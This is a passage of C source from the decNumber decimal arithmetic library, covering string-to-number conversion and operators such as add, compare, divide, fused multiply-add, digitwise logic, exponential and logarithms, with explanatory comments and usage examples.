/* decNumberToEngString(dn, string); */ /* */ /* dn is the decNumber to convert */ /* string is the string where the result will be laid out */ /* */ /* string must be at least dn->digits+14 characters long */ /* */ /* No error is possible, and no status can be set. 
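
   For example (an illustrative sketch, not part of the library;
   assumes DECNUMDIGITS>=9 before decNumber.h was included, and a
   context with traps disabled):

     decNumber dn;
     decContext ctx;
     char buf[DECNUMDIGITS+14];
     decContextDefault(&ctx, DEC_INIT_BASE);
     ctx.traps=0;
     decNumberFromString(&dn, "1.23E+4", &ctx);
     decNumberToString(&dn, buf);      gives "1.23E+4"
     decNumberToEngString(&dn, buf);   gives "12.3E+3"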
*/ /* ------------------------------------------------------------------ */ char * decNumberToString(const decNumber *dn, char *string){ decToString(dn, string, 0); return string; } /* DecNumberToString */ char * decNumberToEngString(const decNumber *dn, char *string){ decToString(dn, string, 1); return string; } /* DecNumberToEngString */ /* ------------------------------------------------------------------ */ /* to-number -- conversion from numeric string */ /* */ /* decNumberFromString -- convert string to decNumber */ /* dn -- the number structure to fill */ /* chars[] -- the string to convert ('\0' terminated) */ /* set -- the context used for processing any error, */ /* determining the maximum precision available */ /* (set.digits), determining the maximum and minimum */ /* exponent (set.emax and set.emin), determining if */ /* extended values are allowed, and checking the */ /* rounding mode if overflow occurs or rounding is */ /* needed. */ /* */ /* The length of the coefficient and the size of the exponent are */ /* checked by this routine, so the correct error (Underflow or */ /* Overflow) can be reported or rounding applied, as necessary. */ /* */ /* If bad syntax is detected, the result will be a quiet NaN. */ /* ------------------------------------------------------------------ */ decNumber * decNumberFromString(decNumber *dn, const char chars[], decContext *set) { Int exponent=0; /* working exponent [assume 0] */ uByte bits=0; /* working flags [assume +ve] */ Unit *res; /* where result will be built */ Unit resbuff[SD2U(DECBUFFER+9)];/* local buffer in case need temporary */ /* [+9 allows for ln() constants] */ Unit *allocres=NULL; /* -> allocated result, iff allocated */ Int d=0; /* count of digits found in decimal part */ const char *dotchar=NULL; /* where dot was found */ const char *cfirst=chars; /* -> first character of decimal part */ const char *last=NULL; /* -> last digit of decimal part */ const char *c; /* work */ Unit *up; /* .. */ #if DECDPUN>1 Int cut, out; /* .. */ #endif Int residue; /* rounding residue */ uInt status=0; /* error code */ #if DECCHECK if (decCheckOperands(DECUNRESU, DECUNUSED, DECUNUSED, set)) return decNumberZero(dn); #endif do { /* status & malloc protection */ for (c=chars;; c++) { /* -> input character */ if (*c>='0' && *c<='9') { /* test for Arabic digit */ last=c; d++; /* count of real digits */ continue; /* still in decimal part */ } if (*c=='.' && dotchar==NULL) { /* first '.' */ dotchar=c; /* record offset into decimal part */ if (c==cfirst) cfirst++; /* first digit must follow */ continue;} if (c==chars) { /* first in string... */ if (*c=='-') { /* valid - sign */ cfirst++; bits=DECNEG; continue;} if (*c=='+') { /* valid + sign */ cfirst++; continue;} } /* *c is not a digit, or a valid +, -, or '.' */ break; } /* c */ if (last==NULL) { /* no digits yet */ status=DEC_Conversion_syntax;/* assume the worst */ if (*c=='\0') break; /* and no more to come... */ #if DECSUBSET /* if subset then infinities and NaNs are not allowed */ if (!set->extended) break; /* hopeless */ #endif /* Infinities and NaNs are possible, here */ if (dotchar!=NULL) break; /* .. 
unless had a dot */ decNumberZero(dn); /* be optimistic */ if (decBiStr(c, "infinity", "INFINITY") || decBiStr(c, "inf", "INF")) { dn->bits=bits | DECINF; status=0; /* is OK */ break; /* all done */ } /* a NaN expected */ /* 2003.09.10 NaNs are now permitted to have a sign */ dn->bits=bits | DECNAN; /* assume simple NaN */ if (*c=='s' || *c=='S') { /* looks like an sNaN */ c++; dn->bits=bits | DECSNAN; } if (*c!='n' && *c!='N') break; /* check caseless "NaN" */ c++; if (*c!='a' && *c!='A') break; /* .. */ c++; if (*c!='n' && *c!='N') break; /* .. */ c++; /* now either nothing, or nnnn payload, expected */ /* -> start of integer and skip leading 0s [including plain 0] */ for (cfirst=c; *cfirst=='0';) cfirst++; if (*cfirst=='\0') { /* "NaN" or "sNaN", maybe with all 0s */ status=0; /* it's good */ break; /* .. */ } /* something other than 0s; setup last and d as usual [no dots] */ for (c=cfirst;; c++, d++) { if (*c<'0' || *c>'9') break; /* test for Arabic digit */ last=c; } if (*c!='\0') break; /* not all digits */ if (d>set->digits-1) { /* [NB: payload in a decNumber can be full length unless */ /* clamped, in which case can only be digits-1] */ if (set->clamp) break; if (d>set->digits) break; } /* too many digits? */ /* good; drop through to convert the integer to coefficient */ status=0; /* syntax is OK */ bits=dn->bits; /* for copy-back */ } /* last==NULL */ else if (*c!='\0') { /* more to process... */ /* had some digits; exponent is only valid sequence now */ Flag nege; /* 1=negative exponent */ const char *firstexp; /* -> first significant exponent digit */ status=DEC_Conversion_syntax;/* assume the worst */ if (*c!='e' && *c!='E') break; /* Found 'e' or 'E' -- now process explicit exponent */ /* 1998.07.11: sign no longer required */ nege=0; c++; /* to (possible) sign */ if (*c=='-') {nege=1; c++;} else if (*c=='+') c++; if (*c=='\0') break; for (; *c=='0' && *(c+1)!='\0';) c++; /* strip insignificant zeros */ firstexp=c; /* save exponent digit place */ for (; ;c++) { if (*c<'0' || *c>'9') break; /* not a digit */ exponent=X10(exponent)+(Int)*c-(Int)'0'; } /* c */ /* if not now on a '\0', *c must not be a digit */ if (*c!='\0') break; /* (this next test must be after the syntax checks) */ /* if it was too long the exponent may have wrapped, so check */ /* carefully and set it to a certain overflow if wrap possible */ if (c>=firstexp+9+1) { if (c>firstexp+9+1 || *firstexp>'1') exponent=DECNUMMAXE*2; /* [up to 1999999999 is OK, for example 1E-1000000998] */ } if (nege) exponent=-exponent; /* was negative */ status=0; /* is OK */ } /* stuff after digits */ /* Here when whole string has been inspected; syntax is good */ /* cfirst->first digit (never dot), last->last digit (ditto) */ /* strip leading zeros/dot [leave final 0 if all 0's] */ if (*cfirst=='0') { /* [cfirst has stepped over .] */ for (c=cfirst; c<last; c++, cfirst++) { if (*c=='.') continue; /* ignore dots */ if (*c!='0') break; /* non-zero found */ d--; /* 0 stripped */ } /* c */ #if DECSUBSET /* make a rapid exit for easy zeros if !extended */ if (*cfirst=='0' && !set->extended) { decNumberZero(dn); /* clean result */ break; /* [could be return] */ } #endif } /* at least one leading 0 */ /* Handle decimal point... */ if (dotchar!=NULL && dotchar<last) /* non-trailing '.' found? */ exponent-=(last-dotchar); /* adjust exponent */ /* [we can now ignore the .] */ /* OK, the digits string is good. 
Assemble in the decNumber, or in */ /* a temporary units array if rounding is needed */ if (d<=set->digits) res=dn->lsu; /* fits into supplied decNumber */ else { /* rounding needed */ Int needbytes=D2U(d)*sizeof(Unit);/* bytes needed */ res=resbuff; /* assume use local buffer */ if (needbytes>(Int)sizeof(resbuff)) { /* too big for local */ allocres=(Unit *)malloc(needbytes); if (allocres==NULL) {status|=DEC_Insufficient_storage; break;} res=allocres; } } /* res now -> number lsu, buffer, or allocated storage for Unit array */ /* Place the coefficient into the selected Unit array */ /* [this is often 70% of the cost of this function when DECDPUN>1] */ #if DECDPUN>1 out=0; /* accumulator */ up=res+D2U(d)-1; /* -> msu */ cut=d-(up-res)*DECDPUN; /* digits in top unit */ for (c=cfirst;; c++) { /* along the digits */ if (*c=='.') continue; /* ignore '.' [don't decrement cut] */ out=X10(out)+(Int)*c-(Int)'0'; if (c==last) break; /* done [never get to trailing '.'] */ cut--; if (cut>0) continue; /* more for this unit */ *up=(Unit)out; /* write unit */ up--; /* prepare for unit below.. */ cut=DECDPUN; /* .. */ out=0; /* .. */ } /* c */ *up=(Unit)out; /* write lsu */ #else /* DECDPUN==1 */ up=res; /* -> lsu */ for (c=last; c>=cfirst; c--) { /* over each character, from least */ if (*c=='.') continue; /* ignore . [don't step up] */ *up=(Unit)((Int)*c-(Int)'0'); up++; } /* c */ #endif dn->bits=bits; dn->exponent=exponent; dn->digits=d; /* if not in number (too long) shorten into the number */ if (d>set->digits) { residue=0; decSetCoeff(dn, set, res, d, &residue, &status); /* always check for overflow or subnormal and round as needed */ decFinalize(dn, set, &residue, &status); } else { /* no rounding, but may still have overflow or subnormal */ /* [these tests are just for performance; finalize repeats them] */ if ((dn->exponent-1<set->emin-dn->digits) || (dn->exponent-1>set->emax-set->digits)) { residue=0; decFinalize(dn, set, &residue, &status); } } /* decNumberShow(dn); */ } while(0); /* [for break] */ if (allocres!=NULL) free(allocres); /* drop any storage used */ if (status!=0) decStatus(dn, status, set); return dn; } /* decNumberFromString */ /* ================================================================== */ /* Operators */ /* ================================================================== */ /* ------------------------------------------------------------------ */ /* decNumberAbs -- absolute value operator */ /* */ /* This computes C = abs(A) */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context */ /* */ /* See also decNumberCopyAbs for a quiet bitwise version of this. */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ /* This has the same effect as decNumberPlus unless A is negative, */ /* in which case it has the same effect as decNumberMinus. 
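
   For example (an illustrative fragment; ctx is a decContext
   prepared with decContextDefault(&ctx, DEC_INIT_BASE) and
   ctx.traps=0, as in the earlier examples):

     decNumber a, r;
     decNumberFromString(&a, "-12.3", &ctx);
     decNumberAbs(&r, &a, &ctx);       r is 12.3

   Being an arithmetic operation, this rounds to ctx.digits and
   may set status, unlike the quiet decNumberCopyAbs.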
*/ /* ------------------------------------------------------------------ */ decNumber * decNumberAbs(decNumber *res, const decNumber *rhs, decContext *set) { decNumber dzero; /* for 0 */ uInt status=0; /* accumulator */ #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif decNumberZero(&dzero); /* set 0 */ dzero.exponent=rhs->exponent; /* [no coefficient expansion] */ decAddOp(res, &dzero, rhs, set, (uByte)(rhs->bits & DECNEG), &status); if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberAbs */ /* ------------------------------------------------------------------ */ /* decNumberAdd -- add two Numbers */ /* */ /* This computes C = A + B */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X+X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ /* This just calls the routine shared with Subtract */ decNumber * decNumberAdd(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decAddOp(res, lhs, rhs, set, 0, &status); if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberAdd */ /* ------------------------------------------------------------------ */ /* decNumberAnd -- AND two Numbers, digitwise */ /* */ /* This computes C = A & B */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X&X) */ /* lhs is A */ /* rhs is B */ /* set is the context (used for result length and error report) */ /* */ /* C must have space for set->digits digits. */ /* */ /* Logical function restrictions apply (see above); a NaN is */ /* returned with Invalid_operation if a restriction is violated. */ /* ------------------------------------------------------------------ */ decNumber * decNumberAnd(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { const Unit *ua, *ub; /* -> operands */ const Unit *msua, *msub; /* -> operand msus */ Unit *uc, *msuc; /* -> result and its msu */ Int msudigs; /* digits in res msu */ #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif if (lhs->exponent!=0 || decNumberIsSpecial(lhs) || decNumberIsNegative(lhs) || rhs->exponent!=0 || decNumberIsSpecial(rhs) || decNumberIsNegative(rhs)) { decStatus(res, DEC_Invalid_operation, set); return res; } /* operands are valid */ ua=lhs->lsu; /* bottom-up */ ub=rhs->lsu; /* .. */ uc=res->lsu; /* .. 
*/ msua=ua+D2U(lhs->digits)-1; /* -> msu of lhs */ msub=ub+D2U(rhs->digits)-1; /* -> msu of rhs */ msuc=uc+D2U(set->digits)-1; /* -> msu of result */ msudigs=MSUDIGITS(set->digits); /* [faster than remainder] */ for (; uc<=msuc; ua++, ub++, uc++) { /* Unit loop */ Unit a, b; /* extract units */ if (ua>msua) a=0; else a=*ua; if (ub>msub) b=0; else b=*ub; *uc=0; /* can now write back */ if (a|b) { /* maybe 1 bits to examine */ Int i, j; *uc=0; /* can now write back */ /* This loop could be unrolled and/or use BIN2BCD tables */ for (i=0; i<DECDPUN; i++) { if (a&b&1) *uc=*uc+(Unit)powers[i]; /* effect AND */ j=a%10; a=a/10; j|=b%10; b=b/10; if (j>1) { decStatus(res, DEC_Invalid_operation, set); return res; } if (uc==msuc && i==msudigs-1) break; /* just did final digit */ } /* each digit */ } /* both OK */ } /* each unit */ /* [here uc-1 is the msu of the result] */ res->digits=decGetDigits(res->lsu, uc-res->lsu); res->exponent=0; /* integer */ res->bits=0; /* sign=0 */ return res; /* [no status to set] */ } /* decNumberAnd */ /* ------------------------------------------------------------------ */ /* decNumberCompare -- compare two Numbers */ /* */ /* This computes C = A ? B */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X?X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for one digit (or NaN). */ /* ------------------------------------------------------------------ */ decNumber * decNumberCompare(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decCompareOp(res, lhs, rhs, set, COMPARE, &status); if (status!=0) decStatus(res, status, set); return res; } /* decNumberCompare */ /* ------------------------------------------------------------------ */ /* decNumberCompareSignal -- compare, signalling on all NaNs */ /* */ /* This computes C = A ? B */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X?X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for one digit (or NaN). */ /* ------------------------------------------------------------------ */ decNumber * decNumberCompareSignal(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decCompareOp(res, lhs, rhs, set, COMPSIG, &status); if (status!=0) decStatus(res, status, set); return res; } /* decNumberCompareSignal */ /* ------------------------------------------------------------------ */ /* decNumberCompareTotal -- compare two Numbers, using total ordering */ /* */ /* This computes C = A ? B, under total ordering */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X?X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for one digit; the result will always be one of */ /* -1, 0, or 1. */ /* ------------------------------------------------------------------ */ decNumber * decNumberCompareTotal(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decCompareOp(res, lhs, rhs, set, COMPTOTAL, &status); if (status!=0) decStatus(res, status, set); return res; } /* decNumberCompareTotal */ /* ------------------------------------------------------------------ */ /* decNumberCompareTotalMag -- compare, total ordering of magnitudes */ /* */ /* This computes C = |A| ? |B|, under total ordering */ /* */ /* res is C, the result. 
C may be A and/or B (e.g., X=X?X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for one digit; the result will always be one of */ /* -1, 0, or 1. */ /* ------------------------------------------------------------------ */ decNumber * decNumberCompareTotalMag(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ uInt needbytes; /* for space calculations */ decNumber bufa[D2N(DECBUFFER+1)];/* +1 in case DECBUFFER=0 */ decNumber *allocbufa=NULL; /* -> allocated bufa, iff allocated */ decNumber bufb[D2N(DECBUFFER+1)]; decNumber *allocbufb=NULL; /* -> allocated bufb, iff allocated */ decNumber *a, *b; /* temporary pointers */ #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif do { /* protect allocated storage */ /* if either is negative, take a copy and absolute */ if (decNumberIsNegative(lhs)) { /* lhs<0 */ a=bufa; needbytes=sizeof(decNumber)+(D2U(lhs->digits)-1)*sizeof(Unit); if (needbytes>sizeof(bufa)) { /* need malloc space */ allocbufa=(decNumber *)malloc(needbytes); if (allocbufa==NULL) { /* hopeless -- abandon */ status|=DEC_Insufficient_storage; break;} a=allocbufa; /* use the allocated space */ } decNumberCopy(a, lhs); /* copy content */ a->bits&=~DECNEG; /* .. and clear the sign */ lhs=a; /* use copy from here on */ } if (decNumberIsNegative(rhs)) { /* rhs<0 */ b=bufb; needbytes=sizeof(decNumber)+(D2U(rhs->digits)-1)*sizeof(Unit); if (needbytes>sizeof(bufb)) { /* need malloc space */ allocbufb=(decNumber *)malloc(needbytes); if (allocbufb==NULL) { /* hopeless -- abandon */ status|=DEC_Insufficient_storage; break;} b=allocbufb; /* use the allocated space */ } decNumberCopy(b, rhs); /* copy content */ b->bits&=~DECNEG; /* .. and clear the sign */ rhs=b; /* use copy from here on */ } decCompareOp(res, lhs, rhs, set, COMPTOTAL, &status); } while(0); /* end protected */ if (allocbufa!=NULL) free(allocbufa); /* drop any storage used */ if (allocbufb!=NULL) free(allocbufb); /* .. */ if (status!=0) decStatus(res, status, set); return res; } /* decNumberCompareTotalMag */ /* ------------------------------------------------------------------ */ /* decNumberDivide -- divide one number by another */ /* */ /* This computes C = A / B */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X/X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ decNumber * decNumberDivide(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decDivideOp(res, lhs, rhs, set, DIVIDE, &status); if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberDivide */ /* ------------------------------------------------------------------ */ /* decNumberDivideInteger -- divide and return integer quotient */ /* */ /* This computes C = A # B, where # is the integer divide operator */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X#X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for set->digits digits. 
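
   For example (an illustrative sketch; ctx prepared as in the
   earlier examples, with traps disabled):

     decNumber a, b, q, iq;
     decNumberFromString(&a, "7", &ctx);
     decNumberFromString(&b, "2", &ctx);
     decNumberDivide(&q, &a, &b, &ctx);           q is 3.5
     decNumberDivideInteger(&iq, &a, &b, &ctx);   iq is 3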
*/ /* ------------------------------------------------------------------ */ decNumber * decNumberDivideInteger(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decDivideOp(res, lhs, rhs, set, DIVIDEINT, &status); if (status!=0) decStatus(res, status, set); return res; } /* decNumberDivideInteger */ /* ------------------------------------------------------------------ */ /* decNumberExp -- exponentiation */ /* */ /* This computes C = exp(A) */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context; note that rounding mode has no effect */ /* */ /* C must have space for set->digits digits. */ /* */ /* Mathematical function restrictions apply (see above); a NaN is */ /* returned with Invalid_operation if a restriction is violated. */ /* */ /* Finite results will always be full precision and Inexact, except */ /* when A is a zero or -Infinity (giving 1 or 0 respectively). */ /* */ /* An Inexact result is rounded using DEC_ROUND_HALF_EVEN; it will */ /* almost always be correctly rounded, but may be up to 1 ulp in */ /* error in rare cases. */ /* ------------------------------------------------------------------ */ /* This is a wrapper for decExpOp which can handle the slightly wider */ /* (double) range needed by Ln (which has to be able to calculate */ /* exp(-a) where a can be the tiniest number (Ntiny). */ /* ------------------------------------------------------------------ */ decNumber * decNumberExp(decNumber *res, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ #if DECSUBSET decNumber *allocrhs=NULL; /* non-NULL if rounded rhs allocated */ #endif #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif /* Check restrictions; these restrictions ensure that if h=8 (see */ /* decExpOp) then the result will either overflow or underflow to 0. */ /* Other math functions restrict the input range, too, for inverses. */ /* If not violated then carry out the operation. */ if (!decCheckMath(rhs, set, &status)) do { /* protect allocation */ #if DECSUBSET if (!set->extended) { /* reduce operand and set lostDigits status, as needed */ if (rhs->digits>set->digits) { allocrhs=decRoundOperand(rhs, set, &status); if (allocrhs==NULL) break; rhs=allocrhs; } } #endif decExpOp(res, rhs, set, &status); } while(0); /* end protected */ #if DECSUBSET if (allocrhs !=NULL) free(allocrhs); /* drop any storage used */ #endif /* apply significant status */ if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberExp */ /* ------------------------------------------------------------------ */ /* decNumberFMA -- fused multiply add */ /* */ /* This computes D = (A * B) + C with only one rounding */ /* */ /* res is D, the result. D may be A or B or C (e.g., X=FMA(X,X,X)) */ /* lhs is A */ /* rhs is B */ /* fhs is C [far hand side] */ /* set is the context */ /* */ /* Mathematical function restrictions apply (see above); a NaN is */ /* returned with Invalid_operation if a restriction is violated. */ /* */ /* C must have space for set->digits digits. 
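
   For example (an illustrative sketch; ctx prepared as in the
   earlier examples):

     decNumber a, b, c, r;
     decNumberFromString(&a, "3", &ctx);
     decNumberFromString(&b, "4", &ctx);
     decNumberFromString(&c, "5", &ctx);
     decNumberFMA(&r, &a, &b, &c, &ctx);    r is 17

   The product 3*4 is held exactly in the widened dcmul context
   set up below, so rounding happens only once, at the final add.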
*/ /* ------------------------------------------------------------------ */ decNumber * decNumberFMA(decNumber *res, const decNumber *lhs, const decNumber *rhs, const decNumber *fhs, decContext *set) { uInt status=0; /* accumulator */ decContext dcmul; /* context for the multiplication */ uInt needbytes; /* for space calculations */ decNumber bufa[D2N(DECBUFFER*2+1)]; decNumber *allocbufa=NULL; /* -> allocated bufa, iff allocated */ decNumber *acc; /* accumulator pointer */ decNumber dzero; /* work */ #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; if (decCheckOperands(res, fhs, DECUNUSED, set)) return res; #endif do { /* protect allocated storage */ #if DECSUBSET if (!set->extended) { /* [undefined if subset] */ status|=DEC_Invalid_operation; break;} #endif /* Check math restrictions [these ensure no overflow or underflow] */ if ((!decNumberIsSpecial(lhs) && decCheckMath(lhs, set, &status)) || (!decNumberIsSpecial(rhs) && decCheckMath(rhs, set, &status)) || (!decNumberIsSpecial(fhs) && decCheckMath(fhs, set, &status))) break; /* set up context for multiply */ dcmul=*set; dcmul.digits=lhs->digits+rhs->digits; /* just enough */ /* [The above may be an over-estimate for subset arithmetic, but that's OK] */ dcmul.emax=DEC_MAX_EMAX; /* effectively unbounded .. */ dcmul.emin=DEC_MIN_EMIN; /* [thanks to Math restrictions] */ /* set up decNumber space to receive the result of the multiply */ acc=bufa; /* may fit */ needbytes=sizeof(decNumber)+(D2U(dcmul.digits)-1)*sizeof(Unit); if (needbytes>sizeof(bufa)) { /* need malloc space */ allocbufa=(decNumber *)malloc(needbytes); if (allocbufa==NULL) { /* hopeless -- abandon */ status|=DEC_Insufficient_storage; break;} acc=allocbufa; /* use the allocated space */ } /* multiply with extended range and necessary precision */ /*printf("emin=%ld\n", dcmul.emin); */ decMultiplyOp(acc, lhs, rhs, &dcmul, &status); /* Only Invalid operation (from sNaN or Inf * 0) is possible in */ /* status; if either is seen than ignore fhs (in case it is */ /* another sNaN) and set acc to NaN unless we had an sNaN */ /* [decMultiplyOp leaves that to caller] */ /* Note sNaN has to go through addOp to shorten payload if */ /* necessary */ if ((status&DEC_Invalid_operation)!=0) { if (!(status&DEC_sNaN)) { /* but be true invalid */ decNumberZero(res); /* acc not yet set */ res->bits=DECNAN; break; } decNumberZero(&dzero); /* make 0 (any non-NaN would do) */ fhs=&dzero; /* use that */ } #if DECCHECK else { /* multiply was OK */ if (status!=0) printf("Status=%08lx after FMA multiply\n", status); } #endif /* add the third operand and result -> res, and all is done */ decAddOp(res, acc, fhs, set, 0, &status); } while(0); /* end protected */ if (allocbufa!=NULL) free(allocbufa); /* drop any storage used */ if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberFMA */ /* ------------------------------------------------------------------ */ /* decNumberInvert -- invert a Number, digitwise */ /* */ /* This computes C = ~A */ /* */ /* res is C, the result. C may be A (e.g., X=~X) */ /* rhs is A */ /* set is the context (used for result length and error report) */ /* */ /* C must have space for set->digits digits. */ /* */ /* Logical function restrictions apply (see above); a NaN is */ /* returned with Invalid_operation if a restriction is violated. 
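
   For example, with ctx.digits=9 (an illustrative sketch; ctx
   prepared as in the earlier examples):

     decNumber x, r;
     decNumberFromString(&x, "1101", &ctx);
     decNumberInvert(&r, &x, &ctx);     r is 111110010

   The operand is implicitly padded with 0 digits on the left to
   ctx.digits digits before each digit is inverted.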
*/ /* ------------------------------------------------------------------ */ decNumber * decNumberInvert(decNumber *res, const decNumber *rhs, decContext *set) { const Unit *ua, *msua; /* -> operand and its msu */ Unit *uc, *msuc; /* -> result and its msu */ Int msudigs; /* digits in res msu */ #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif if (rhs->exponent!=0 || decNumberIsSpecial(rhs) || decNumberIsNegative(rhs)) { decStatus(res, DEC_Invalid_operation, set); return res; } /* operand is valid */ ua=rhs->lsu; /* bottom-up */ uc=res->lsu; /* .. */ msua=ua+D2U(rhs->digits)-1; /* -> msu of rhs */ msuc=uc+D2U(set->digits)-1; /* -> msu of result */ msudigs=MSUDIGITS(set->digits); /* [faster than remainder] */ for (; uc<=msuc; ua++, uc++) { /* Unit loop */ Unit a; /* extract unit */ Int i, j; /* work */ if (ua>msua) a=0; else a=*ua; *uc=0; /* can now write back */ /* always need to examine all bits in rhs */ /* This loop could be unrolled and/or use BIN2BCD tables */ for (i=0; i<DECDPUN; i++) { if ((~a)&1) *uc=*uc+(Unit)powers[i]; /* effect INVERT */ j=a%10; a=a/10; if (j>1) { decStatus(res, DEC_Invalid_operation, set); return res; } if (uc==msuc && i==msudigs-1) break; /* just did final digit */ } /* each digit */ } /* each unit */ /* [here uc-1 is the msu of the result] */ res->digits=decGetDigits(res->lsu, uc-res->lsu); res->exponent=0; /* integer */ res->bits=0; /* sign=0 */ return res; /* [no status to set] */ } /* decNumberInvert */ /* ------------------------------------------------------------------ */ /* decNumberLn -- natural logarithm */ /* */ /* This computes C = ln(A) */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context; note that rounding mode has no effect */ /* */ /* C must have space for set->digits digits. */ /* */ /* Notable cases: */ /* A<0 -> Invalid */ /* A=0 -> -Infinity (Exact) */ /* A=+Infinity -> +Infinity (Exact) */ /* A=1 exactly -> 0 (Exact) */ /* */ /* Mathematical function restrictions apply (see above); a NaN is */ /* returned with Invalid_operation if a restriction is violated. */ /* */ /* An Inexact result is rounded using DEC_ROUND_HALF_EVEN; it will */ /* almost always be correctly rounded, but may be up to 1 ulp in */ /* error in rare cases. */ /* ------------------------------------------------------------------ */ /* This is a wrapper for decLnOp which can handle the slightly wider */ /* (+11) range needed by Ln, Log10, etc. (which may have to be able */ /* to calculate at p+e+2). */ /* ------------------------------------------------------------------ */ decNumber * decNumberLn(decNumber *res, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ #if DECSUBSET decNumber *allocrhs=NULL; /* non-NULL if rounded rhs allocated */ #endif #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif /* Check restrictions; this is a math function; if not violated */ /* then carry out the operation. 
*/ if (!decCheckMath(rhs, set, &status)) do { /* protect allocation */ #if DECSUBSET if (!set->extended) { /* reduce operand and set lostDigits status, as needed */ if (rhs->digits>set->digits) { allocrhs=decRoundOperand(rhs, set, &status); if (allocrhs==NULL) break; rhs=allocrhs; } /* special check in subset for rhs=0 */ if (ISZERO(rhs)) { /* +/- zeros -> error */ status|=DEC_Invalid_operation; break;} } /* extended=0 */ #endif decLnOp(res, rhs, set, &status); } while(0); /* end protected */ #if DECSUBSET if (allocrhs !=NULL) free(allocrhs); /* drop any storage used */ #endif /* apply significant status */ if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberLn */ /* ------------------------------------------------------------------ */ /* decNumberLogB - get adjusted exponent, by 754r rules */ /* */ /* This computes C = adjustedexponent(A) */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context, used only for digits and status */ /* */ /* C must have space for 10 digits (A might have 10**9 digits and */ /* an exponent of +999999999, or one digit and an exponent of */ /* -1999999999). */ /* */ /* This returns the adjusted exponent of A after (in theory) padding */ /* with zeros on the right to set->digits digits while keeping the */ /* same value. The exponent is not limited by emin/emax. */ /* */ /* Notable cases: */ /* A<0 -> Use |A| */ /* A=0 -> -Infinity (Division by zero) */ /* A=Infinite -> +Infinity (Exact) */ /* A=1 exactly -> 0 (Exact) */ /* NaNs are propagated as usual */ /* ------------------------------------------------------------------ */ decNumber * decNumberLogB(decNumber *res, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif /* NaNs as usual; Infinities return +Infinity; 0->oops */ if (decNumberIsNaN(rhs)) decNaNs(res, rhs, NULL, set, &status); else if (decNumberIsInfinite(rhs)) decNumberCopyAbs(res, rhs); else if (decNumberIsZero(rhs)) { decNumberZero(res); /* prepare for Infinity */ res->bits=DECNEG|DECINF; /* -Infinity */ status|=DEC_Division_by_zero; /* as per 754r */ } else { /* finite non-zero */ Int ae=rhs->exponent+rhs->digits-1; /* adjusted exponent */ decNumberFromInt32(res, ae); /* lay it out */ } if (status!=0) decStatus(res, status, set); return res; } /* decNumberLogB */ /* ------------------------------------------------------------------ */ /* decNumberLog10 -- logarithm in base 10 */ /* */ /* This computes C = log10(A) */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context; note that rounding mode has no effect */ /* */ /* C must have space for set->digits digits. */ /* */ /* Notable cases: */ /* A<0 -> Invalid */ /* A=0 -> -Infinity (Exact) */ /* A=+Infinity -> +Infinity (Exact) */ /* A=10**n (if n is an integer) -> n (Exact) */ /* */ /* Mathematical function restrictions apply (see above); a NaN is */ /* returned with Invalid_operation if a restriction is violated. */ /* */ /* An Inexact result is rounded using DEC_ROUND_HALF_EVEN; it will */ /* almost always be correctly rounded, but may be up to 1 ulp in */ /* error in rare cases. */ /* ------------------------------------------------------------------ */ /* This calculates ln(A)/ln(10) using appropriate precision. For */ /* ln(A) this is the max(p, rhs->digits + t) + 3, where p is the */ 